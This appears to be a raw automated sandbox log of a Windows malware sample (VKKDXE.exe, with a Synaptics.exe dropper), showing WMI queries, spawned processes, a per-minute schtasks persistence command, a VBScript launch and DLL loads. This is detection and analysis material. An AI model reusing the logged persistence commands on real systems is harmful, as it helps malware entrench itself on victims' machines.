Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'

Source: C:\Users\user\Desktop\VKKDXE.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VKKDXE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: VKKDXE.exe	Virustotal: Detection: 85%
Source: VKKDXE.exe	ReversingLabs: Detection: 92%

Source: C:\Users\user\Desktop\VKKDXE.exe

File read: C:\Users\user\Desktop\VKKDXE.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VKKDXE.exe "C:\Users\user\Desktop\VKKDXE.exe"
Source: C:\Users\user\Desktop\VKKDXE.exe	Process created: C:\Users\user\Desktop\._cache_VKKDXE.exe "C:\Users\user\Desktop\._cache_VKKDXE.exe"
Source: C:\Users\user\Desktop\VKKDXE.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 6408
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 6408
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\VKKDXE.exe	Process created: C:\Users\user\Desktop\._cache_VKKDXE.exe "C:\Users\user\Desktop\._cache_VKKDXE.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: winmm.dll
